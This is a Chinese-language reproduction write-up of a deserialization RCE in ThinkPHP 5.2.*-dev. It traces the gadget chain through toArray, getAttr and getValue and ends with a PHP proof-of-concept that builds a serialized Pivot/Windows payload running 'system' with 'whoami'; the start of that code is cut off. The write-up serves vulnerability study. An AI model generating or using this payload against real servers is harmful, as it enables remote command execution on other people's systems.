# Thinkphp 5.2.*-dev 反序列化漏洞
================================
一、漏洞简介
————
所有Thinkphp版本下载链接
二、漏洞影响
————
三、复现过程
————
### 环境搭建
composer create-project topthink/think=5.2.*-dev v5.2
### poc演示截图
![](/static/qingy/Thinkphp_5.2._-dev_反序列化漏洞/img/rId27.png)
### 调用链
![](/static/qingy/Thinkphp_5.2._-dev_反序列化漏洞/img/rId29.png)
### 单步调试
可以看到前面的链跟tp5.1.x的一样,这里不在列举,直接进去toArray函数,可以看到\$data可控
public function toArray(): array
{
。。。
$data = array_merge($this->data, $this->relation);
foreach ($data as $key => $val) {
if ($val instanceof Model || $val instanceof ModelCollection) {
// 关联模型对象
if (isset($this->visible[$key])) {
$val->visible($this->visible[$key]);
} elseif (isset($this->hidden[$key])) {
$val->hidden($this->hidden[$key]);
}
// 关联模型对象
$item[$key] = $val->toArray();
} elseif (isset($this->visible[$key])) {
$item[$key] = $this->getAttr($key);
} elseif (!isset($this->hidden[$key]) && !$hasVisible) {
$item[$key] = $this->getAttr($key);
}
}
。。。
public function getAttr(string $name)
{
try {
$relation = false;
$value = $this->getData($name);
} catch (InvalidArgumentException $e) {
$relation = true;
$value = null;
}
return $this->getValue($name, $value, $relation);
}
public function getData(string $name = null)
{
if (is_null($name)) {
return $this->data;
}
$fieldName = $this->getRealFieldName($name);
if (array_key_exists($fieldName, $this->data)) {
return $this->data[$fieldName];
…
}
}
protected function getRealFieldName(string $name): string
{
return $this->strict ? $name : App::parseName($name); //this->strict默认为true
}
可以看到getAttr函数中的\$value可控,那么导致\$this-\>getValue(\$name,
\$value, \$relation);这里的三个参数都可控,跟进\$this-\>getValue(\$name,
\$value, \$relation);
protected function getValue(string $name, $value, bool $relation = false)
{
// 检测属性获取器
$fieldName = $this->getRealFieldName($name);
$method = ‘get’ . App::parseName($name, 1) . ‘Attr’;
if (isset($this->withAttr[$fieldName])) {
if ($relation) {
$value = $this->getRelationValue($name);
}
$closure = $this->withAttr[$fieldName];
$value = $closure($value, $this->data);
这里\$fieldName、\$this-\>withAttr,导致\$closure也可控,最终直接产生RCE。如下图
![](/static/qingy/Thinkphp_5.2._-dev_反序列化漏洞/img/rId31.png)
补充:
files = array($files);
}
}
}
namespace think\model\concern {
trait Conversion
{
protected $append = array(“Smi1e” => “1”);
}
trait Attribute
{
private $data;
private $withAttr = array(“Smi1e” => “system”);
public function get($system)
{
$this->data = array(“Smi1e” => “$system”);
}
}
}
namespace think {
abstract class Model
{
use model\concern\Attribute;
use model\concern\Conversion;
}
}
namespace think\model{
use think\Model;
class Pivot extends Model
{
public function __construct($system)
{
$this->get($system);
}
}
}
namespace{
$Conver = new think\model\Pivot(“whoami”);
$payload = new think\process\pipes\Windows($Conver);
echo base64_encode(serialize($payload));
}
?>
四、参考链接
————
>
请登录后查看评论内容